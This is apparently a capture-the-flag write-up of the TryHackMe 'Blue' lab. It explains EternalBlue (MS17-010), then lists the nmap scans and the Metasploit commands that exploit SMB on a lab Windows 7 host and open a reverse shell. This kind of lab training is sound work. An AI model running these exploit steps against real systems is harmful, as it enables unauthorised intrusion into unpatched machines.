Home⌘ PROJECTS

[🇺🇸] [WriteUp] - Blue (TryHackMe)

Discover EternalBlue, MS17-010, RCE Vulnerability
Mar 27 2025
Hacking, Windows
Writeup 1

Machine: Blue (TryHackMe)

 

Difficulty Level: ⭐

 

Blue is a machine with a vulnerability in the 445 protocol SMB. EternalBlue allows remote code execution that was discovered in [MS17-010]

Summary:

  • Port Scanning
  • Vulnerability Exploitation (MS17-010 / EternalBlue)
  • Remote Shell
  • Privileges Escalation to NT AUTHORITY\SYSTEM
  • Dumping Password Hashes using Hashdump
  • Hash cracking with John the Ripper
  • Flag search

At the end of the writeup I'll give you a summary of the entire machine, in english and spanish 🥳.

IMPORTANT You must have a virtual machine or audit operating system with root privileges and an Internet connection..

Methodology to be used:

  • Reconnaissance
  • Enumeration
  • Vulnerability search and analysis
  • Exploitation
  • Post-exploitation

¿What is EternalBlue?

Eternal Blue is an exploit that was allegedly developed by the U.S. National Security Agency (NSA). This program was stolen and then leaked by "The Shadow Brokers". It was then used to execute one of the most damaging ransomware attacks in history, known as Wannacry. The eternal blue virus program was designed to exploit a vulnerability registered as CVE-2017-0144, which corresponds to a security flaw in Microsoft's Server Message Block protocol (SMB). The security patch for this eternal blue virus vulnerability, called MS17-010, was released in March 2017. The use of the eternal blue exploited mainly affected hospitals, police stations and, in general, organizations around the world.

Versions with MS17-010 CVE Versions

 

Port Scan - Reconnaissance

Lets start with the reconnaissance phase. Our IP is 10.8.42.68 and the target is 10.10.90.82

#POWERSHELL
1ping -c 1 10.10.90.82
2
#POWERSHELL
1nmap -sn 10.10.90.82
2
#POWERSHELL
1sudo su
2
#POWERSHELL
1nmap 10.10.90.82 -p- -sV -oN all_ports.nmap -Pn --min-rate 5000
2

ó

#POWERSHELL
1sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.90.82 -oG Escaneo
2

Output:

EscaneoBlue.png

The 445/tcp for microsoft-ds Windows 7 port is open, this is the port that the vulnerability is going to be exploited.

 

Vulnerability Exploitation

#POWERSHELL
1msfconsole
2
3> search ms17-010
4
5or 
6
7> search eternalblue
8
9> use exploit/windows/smb/ms17_010_eternalblue
10
11or 
12
13> use 0
14
15> show options
16

showoptions

#POWERSHELL
1> set RHOSTS 10.10.90.82
2> set LPORT 65000
3> set LHOST 10.8.42.68
4
5> run
6

runBlue

blueHelp

#POWERSHELL
1> search ms17-010
2

 

Mas adelante mostraré a realizar pruebas de penetración a diferentes sistemas en tu laboratorio.

 

© 2025